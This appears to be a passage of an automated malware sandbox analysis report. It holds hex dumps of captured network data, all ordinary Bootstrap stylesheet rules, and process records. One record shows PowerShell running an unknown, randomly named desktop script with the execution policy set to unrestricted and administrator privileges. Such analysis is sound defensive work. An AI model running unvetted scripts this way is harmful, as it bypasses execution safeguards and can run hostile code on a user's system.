                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 7b 68 65 69 67 68 74 3a 61 75 74 6f 7d 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 7d 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 63 61 6e 63 65 6c 2d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63
                                                                        Data Ascii: {height:auto}input[type=search]{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearanc
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 47 6c 79 70 68 69 63 6f 6e 73 20 48 61 6c 66 6c 69 6e 67 73 27 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 29 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 65 6f 74 3f 23 69 65 66 69 78 29 20 66 6f 72 6d 61 74 28 27 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 27 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 67 6c 79 70 68 69 63 6f 6e 73 2d 68 61 6c 66 6c 69 6e 67 73 2d 72 65 67 75 6c 61 72 2e 77 6f 66
                                                                        Data Ascii: :1px solid #ddd!important}}@font-face{font-family:'Glyphicons Halflings';src:url(../fonts/glyphicons-halflings-regular.eot);src:url(../fonts/glyphicons-halflings-regular.eot?#iefix) format('embedded-opentype'),url(../fonts/glyphicons-halflings-regular.wof
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 5c 65 30 31 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 7a 6f 6f 6d 2d 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 7a 6f 6f 6d 2d 6f 75 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 31 36 22 7d 2e 67 6c 79 70 68
                                                                        Data Ascii: \e010"}.glyphicon-th:before{content:"\e011"}.glyphicon-th-list:before{content:"\e012"}.glyphicon-ok:before{content:"\e013"}.glyphicon-remove:before{content:"\e014"}.glyphicon-zoom-in:before{content:"\e015"}.glyphicon-zoom-out:before{content:"\e016"}.glyph
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 63 6f 6e 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6f 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 6f 6c 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 74 61 6c 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 65 78 74 2d 68 65 69
                                                                        Data Ascii: con-bookmark:before{content:"\e044"}.glyphicon-print:before{content:"\e045"}.glyphicon-camera:before{content:"\e046"}.glyphicon-font:before{content:"\e047"}.glyphicon-bold:before{content:"\e048"}.glyphicon-italic:before{content:"\e049"}.glyphicon-text-hei
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 70 68 69 63 6f 6e 2d 73 74 65 70 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 65 6a 65 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 37 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 6c 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 69 6e 75 73 2d 73 69 67 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74
                                                                        Data Ascii: phicon-step-forward:before{content:"\e077"}.glyphicon-eject:before{content:"\e078"}.glyphicon-chevron-left:before{content:"\e079"}.glyphicon-chevron-right:before{content:"\e080"}.glyphicon-plus-sign:before{content:"\e081"}.glyphicon-minus-sign:before{cont
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6d 61 67 6e 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 74 77 65 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 31 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74
                                                                        Data Ascii: "}.glyphicon-comment:before{content:"\e111"}.glyphicon-magnet:before{content:"\e112"}.glyphicon-chevron-up:before{content:"\e113"}.glyphicon-chevron-down:before{content:"\e114"}.glyphicon-retweet:before{content:"\e115"}.glyphicon-shopping-cart:before{cont
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 61 70 65 72 63 6c 69 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 65 61 72 74 2d 65 6d 70 74 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6c 69 6e 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 75 73 68 70 69 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 34 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 75 73 64 3a 62 65 66
                                                                        Data Ascii: rd:before{content:"\e141"}.glyphicon-paperclip:before{content:"\e142"}.glyphicon-heart-empty:before{content:"\e143"}.glyphicon-link:before{content:"\e144"}.glyphicon-phone:before{content:"\e145"}.glyphicon-pushpin:before{content:"\e146"}.glyphicon-usd:bef
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 73 61 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 6f 70 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 72 65 64 69 74 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 72 61 6e 73 66 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 38 22 7d 2e 67 6c 79 70 68 69
                                                                        Data Ascii: re{content:"\e173"}.glyphicon-floppy-remove:before{content:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e176"}.glyphicon-credit-card:before{content:"\e177"}.glyphicon-transfer:before{content:"\e178"}.glyphi


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:02:29:00
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1"
                                                                        Imagebase:0x1e0000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:02:29:00
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:02:29:01
                                                                        Start date:18/02/2025
                                                                        Path:C:\Windows\System32\notepad.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\XkgoE6Yb52.ps1"
                                                                        Imagebase:0x7ff7c9fc0000
                                                                        File size:201'216 bytes
                                                                        MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >